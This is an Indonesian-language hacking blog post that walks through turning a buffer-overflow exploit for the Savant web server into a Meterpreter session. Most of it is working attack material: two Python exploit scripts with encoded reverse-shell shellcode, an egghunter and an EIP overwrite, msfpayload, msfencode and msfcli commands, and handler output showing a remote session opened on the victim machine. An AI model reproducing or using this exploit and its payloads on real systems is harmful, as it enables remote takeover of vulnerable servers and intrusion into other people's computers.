Searching...
January 11, 2012
Anonymous
Wednesday, January 11, 2012
0 comment

Savant 0day to Meterpreter

Home » 0day » exploitation » Metasploit » Penetration Test » Savant 0day to Meterpreter
Pembahasan sebelumnya mengenai from bug to 0day EggHunter VS Savant, kita telah menemukan script 0day seperti ini

Code:

#!/usr/bin/pythonimport socket
target_address="192.168.1.6"target_port=80
buffer2 = "R0cX" + "R0cX" # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.8 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t cbuffer2 += ("\xda\xd1\xba\x00\x2d\x36\x8b\xd9\x74\x24\xf4\x58\x33\xc9\xb1""\x63\x31\x50\x1a\x03\x50\x1a\x83\xe8\xfc\xe2\xf5\x97\xf7\x4b""\x64\xd5\x2e\x8c\x5f\x6e\xf5\xe7\x01\xbe\x3c\xb6\xe0\xf1\xe8""\xab\x99\x34\x10\xcf\x0a\x76\x6a\x08\x9c\xdc\x7f\x34\xea\x5b""\x5b\x52\xd0\x86\x97\x76\xd7\x1c\xdd\xcb\xb5\x32\x9c\xf2\x7b""\x1d\xe3\x4e\xaa\xad\x18\xa8\x0c\x13\xdb\x5d\x75\x59\xc7\xb4""\xdf\x57\xa7\x21\x15\x7b\x1d\x3a\x94\xc4\x78\x82\x94\x0c\x7e""\x2a\x03\xb5\x61\x96\xde\x43\x1f\xb0\x50\xc9\xef\xd4\xc0\xe3""\x25\xd6\xc3\x3f\xdf\xe4\xa7\x6a\x8c\x7a\xbe\x71\x46\xe8\x3c""\xb8\x64\x4c\xbc\x81\xd7\x73\x6a\x1d\x17\x71\x12\x78\x18\x1a""\xa5\x85\x6d\x6d\x92\xb1\x15\x06\x6a\xf4\x47\xab\xfd\x8e\x71""\xb1\xb9\xd8\x56\x9a\x3a\xc8\x13\x73\xc7\xac\xae\x62\xeb\xf8""\x35\x2f\x20\xa0\x8a\xe2\xa4\x1d\x65\x01\x18\x30\xca\x7a\x17""\x5b\xfa\x55\xb7\x9d\xf2\xee\x59\x21\x7f\x78\x72\x9e\x11\xa0""\xdc\xb9\x76\x29\x41\x84\x96\x22\x41\x71\x86\x42\x37\x1a\xcb""\x58\xd9\x21\x25\x85\x86\x6c\x7a\x70\xb3\x8c\xbb\x60\xae\xbe""\x10\x4d\x36\x35\xf0\xdd\x5e\x4a\x79\x03\xb9\x99\x81\x96\xe2""\xc6\xeb\x87\x2d\x97\x17\x94\x34\x0d\x31\x14\x33\xf8\x98\x09""\x42\x09\xb8\x03\xf1\x7b\x2f\x23\xb0\xf2\xdd\x7e\x8c\x49\x48""\x03\xac\x5a\xeb\xb8\xd1\x9e\x78\x91\x4a\x8b\x2c\x13\x8c\x07""\xaf\x70\x3d\x3f\x4b\xf7\x54\x46\x1e\x23\x4e\x6c\xb0\x41\x7c""\x0b\x90\x84\x9e\x7e\xf5\xa7\x74\x63\xf8\x33\x12\xd5\xb5\xa5""\xb4\xce\xe5\xab\xd9\x13\x11\x8d\xda\x30\xb2\x8e\xc8\x85\x72""\x4f\x2e\x80\xc1\x74\xb8\x0a\xcc\xdd\xda\x0f\x97\xdd\xbc\xa8""\xb8\x52\x80\x59\x97\xda\x2a\xb3\x0e\x32\x02\x5a\x54\xb3\xc6""\xd3\xe6\xd9\x1c\x9e\xb8\x54\x81\x7b\xbb\x20\x79\x26\x62\x00""\xc7\x57\xb1\xdf\x48\xb8\xd6\xc4\xde\xeb\x3d\xc7\xee\x8c\x49""\xa7\x39\xc4\xf4\x88\x4f\x31\x13\xd0\x31\xec\x9f\x14\x84\x89""\xa1\x2d")
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cXbadbuffer += "\x90" * (254 - len(badbuffer))badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETNhttpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect=sock.connect((target_address,target_port))sock.send(sendbuf)sock.close()

Melalui script ini, kita mampu mengakses command prompt korban. Lalu bagaimana memanfaatkan script ini untuk mendapatkan sesi meterpreter?

Sangat mudah. Kita hanya perlu mengubah buffer2 += (shell_reverse_tcp) menjadi buffer2 += (meterpreter/reverse_tcp)

Untuk mendapatkan shell code meterpreter/reverse_tcp, kita akan menggunakan msfpayload dan msfencode. Dan menggunakan text editor untuk mengedit script 0day kita.

Preparation:
[*] msfpayload
[*] msfencode
[*] text editor

Walkthrough:

1. Mencari shell code windows/meterpreter/reverse_tcp

Buka terminal, kemudian masukan perintah:

Code:
root@revolution:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c

Keterangan:
1. Kita akan menggunakan shell code windows/meterpreter/reverse_tcp
2. LHOST adalah IP address saya
3. LPORT bisa diisi sesuka hati
4. Kita akan menggunakan encoder x86/shikata_ga_nai
5. Melakukan encoding sebanyak 4 kali
6. Kemudian mencetak hasil shell code

Hasilnya:



Code:
root@revolution:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
unsigned char buf[] = "\xd9\xca\xbf\x15\x32\x9c\xb6\xd9\x74\x24\xf4\x5d\x33\xc9\xb1""\x5d\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\xe0\x8d\xfc\x33""\x22\x11\x25\xf9\xeb\xa1\xf2\x0a\x53\x61\x32\x43\x34\x44\xbc""\xb6\xb9\xde\x2e\x34\x1d\x9f\x85\x2c\xa7\xf8\xad\x81\xb0\x7d""\x90\x1a\x5d\x6f\x81\xbc\x1b\x1f\x36\x74\xd6\x77\xa5\xe1\x70""\xf8\x4a\x5a\xef\x48\xc7\x84\x9c\x3a\x5e\x22\x2d\x58\xbc\xf1""\x22\xfb\xe6\x84\xba\xe1\xb1\x38\xd4\x47\xd5\x3a\x02\x6d\x4a""\x76\xcf\xec\xdb\x86\x8b\x4a\xd0\x44\xb0\x32\xfc\x3d\xa6\xb4""\x18\xf0\x3d\x80\x4e\x88\x36\xab\x50\xba\xa2\xc7\x1f\xea\xb6""\x2f\x96\x89\xe4\x90\xe2\x4b\x93\x8a\xe3\x46\x42\x65\x0a\x93""\xc3\x36\x65\x45\x7c\x5d\x3b\x27\x6b\x23\x01\x8c\x5b\xf0\x02""\x49\xbb\xef\x51\x3e\x8a\x9f\xdd\xb5\xb6\xcb\xa2\x5b\x01\x25""\x43\x4e\x22\xd6\x6c\x1d\x5a\xbb\x3c\x84\xc9\xfc\x58\x66\x99""\x20\xd3\xfb\xc1\x1f\x9a\x6a\x21\x2d\x8b\x3d\xcf\x23\x27\xad""\x90\xda\xf1\xe4\x63\x81\x30\xd4\x8f\x14\xaa\xfc\xb2\x5a\xbd""\x29\x6d\xdd\xe0\x8d\x38\x92\xeb\x5c\xdf\x35\xf8\xa7\x33\xe3""\x0c\x34\x62\x9c\x80\xd9\x64\x16\x6d\xcd\x43\x9c\x3d\x8b\x6b""\xd9\x28\xca\x5f\x81\xb4\xe1\xe6\x11\xc6\x5d\xcb\x6f\x2c\xe1""\xe7\xe4\x41\xba\x19\x1c\x5c\x77\x6a\x9e\xd0\x47\xf6\x30\x09""\xe1\xf9\x38\x44\x4e\xdf\xe7\xf3\x1f\xc4\xe0\xed\xd4\x80\x46""\xef\x3a\xa1\x09\xd6\xfd\x5d\x80\x94\x31\x18\x4f\xef\x72\x33""\x77\xcf\xfa\x51\xef\xf9\xfb\xae\x2f\x92\xfb\xff\x5c\x8d\x69""\x35\xf9\x6b\xc7\xa6\x64\x39\xca\x85\x39\x56\x26\x94\xb7\xf7""\x22\x9d\x0d\x8c\x55\x08\x24\x98\x06\x26\xb0\x5c\x72\x9c\x2c""\x7b\x2c\x31\xfd\x0d\xac\xa0\x5f\x19\x8d\xca\xbf\xca\x22\x83""\x35\x17\xe4\x1d\x7f\xa4\x9a\xe2\x05\xc0\x2b\xdb\x39\x55\x80""\x12\xe8\xbe\x54\xd3\x62\xba\x06"


2. Memodifikasi script 0day

Kemudian masukan shell code di atas, sehingga script 0day kita menjadi seperti ini:

Code:
#!/usr/bin/python
import sockettarget_address="172.16.230.128"target_port=80
buffer2 = "R0cX" + "R0cX" # msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t cbuffer2 += ("\xbb\xc4\x86\x09\x6a\xda\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1""\x5d\x31\x5f\x15\x83\xef\xfc\x03\x5f\x11\xe2\x31\x3e\xd8\x1a""\x43\x1f\x01\x06\x6a\x14\x91\x43\xd2\xe6\x10\x1a\xbd\x8b\x4d""\xa1\x70\xca\x9f\x59\xe5\xac\x87\x88\xa6\xcd\xbb\x8d\x85\x54""\xce\xe8\x40\xbc\x43\xca\xac\x6b\x68\x6a\xe9\x04\x50\xb7\x7b""\x48\x92\xbe\x13\x3f\xf4\x81\xf5\xe7\xe0\x0f\x72\xb9\xb0\x42""\xf2\x40\x64\xf3\xce\x54\xcd\x67\x4c\xe2\x4c\x49\xdc\x37\x0b""\xd5\x7c\x79\xbc\x30\xff\x46\x31\x68\xd8\x74\xc2\xc0\xd6\xee""\xec\x5f\x0e\x9e\x2b\xf1\xc8\x3f\xb5\x44\xbe\x12\x41\x94\xe8""\xe9\xca\x45\x9f\x6f\x52\x9b\x89\x99\x54\x4c\x22\xbf\x81\xae""\xdf\x7b\xed\x36\x47\x4f\x37\x91\x87\x67\x84\x1b\xc7\xe8\x8e""\x6b\xb5\x09\xe6\x1e\x95\x64\xb6\x06\x50\xfc\xe4\x3b\x65\x40""\x0a\xc8\x8a\x52\x03\xf2\xd9\x97\x32\x3f\xbd\xbe\x60\x35\x8d""\x21\x9f\x55\x47\x93\x3f\x4a\x8e\x3d\x3c\x5d\xeb\xe4\x70\xd1""\xb0\x0b\xa7\x96\x87\xf8\x26\x48\x3c\x5d\x79\x8d\x1c\xa3\xf6""\xd4\x71\x35\xdd\x06\x06\xca\x2e\x54\x64\x15\x5d\xb9\xe7\x88""\x91\xb0\x62\x1c\xd1\xbd\x5c\x9c\x64\x71\xd4\xab\xe7\x01\x4d""\x68\x44\xa4\xd3\xa3\x2f\x3b\xf4\xdf\x6f\x69\x74\xb5\xf0\xb4""\x33\x69\xed\xc8\xad\xd9\xec\x09\xbe\x02\xb6\xaa\xfd\xcd\x10""\x20\x11\xc5\xf8\x39\x4b\xff\x9e\x18\xb6\xb5\xe0\xed\x37\xa1""\x34\xef\xbb\xae\x05\x1a\x41\x72\x4d\xcc\x60\x61\xb4\xf1\x48""\xc7\x84\x95\x93\xf3\xc4\x88\x1e\xa2\x12\xc5\x39\xfb\x64\x48""\xfa\xb0\x8a\xd1\x2a\x5e\xc7\x4d\x59\xaf\x70\xf8\x34\xa8\x05""\xa8\xa2\x4b\xde\x06\x42\xcb\x17\x30\xd6\x4b\x83\x5c\xc6\x70""\x94\xe4\x22\xf5\x5a\x84\x60\x4d\xed\x4a\xae\x60\x54\x2a\x03""\x20\xb3\x14\xd6\xe9\xae\x15\x84\x7c\xea\x4b\x73\xa8\x1c\x85""\x6c\x22\xe1\x4d\x84\xfd\x3f\x95")
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cXbadbuffer += "\x90" * (254 - len(badbuffer))badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETNhttpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect=sock.connect((target_address,target_port))sock.send(sendbuf)sock.close()

Keterangan:
1. Ganti target_address menjadi IP address korban

Buka terminal, lalu masukan perintah:

Code:
root@revolution:~/Desktop# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 E

Keterangan:
1. LHOST adalah IP address anda
2. LPORT harus bernilai sama dengan LPORT ketika membuat shell code pada tahap pertama


3. Sending our buffer

Kemudian kita kirimkan script 0day kepada korban:

Code:
root@revolution:~/Desktop# python 0day.py




4. Game Over

Tunggu beberapa saat, sampai metasploit kita menerima pesanan stager.

Code:
root@revolution:~/Desktop# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 E[*] Please wait while we load the module tree...

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33fEFLAGS: 00010046eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60ds: 0018   es: 0018  ss: 0018Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090       90909090990909090990909090       90909090.90909090.90909090       90909090.90909090.90909090       90909090.90909090.09090900       90909090.90909090.09090900       ..........................       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       ccccccccc.................       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       .................ccccccccc       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       ..........................       ffffffffffffffffffffffffff       ffffffff..................       ffffffffffffffffffffffffff       ffffffff..................       ffffffff..................       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00Aiee, Killing Interrupt handlerKernel panic: Attempted to kill the idle task!In swapper task - not syncing


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]+ -- --=[ 787 exploits - 423 auxiliary - 127 post+ -- --=[ 238 payloads - 27 encoders - 8 nops       =[ svn r14537 updated today (2012.01.10)
PAYLOAD => windows/meterpreter/reverse_tcpLHOST => 172.16.230.1LPORT => 4444[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 172.16.230.128[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1039) at 2012-01-11 17:38:16 +0700
meterpreter >

Berhasil, dan setelah di cek process work directory, saya berada dalam direktory savant, dimana savant telah mengalami buffer overflow.



Code:
meterpreter > pwdC:\Savantroot@revolution

Excellent as usual =)

created by red-dragon
Originaly Created By Anonymous on Wednesday, January 11, 2012
Labels: , , ,
Share This To :

0 comment:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to top!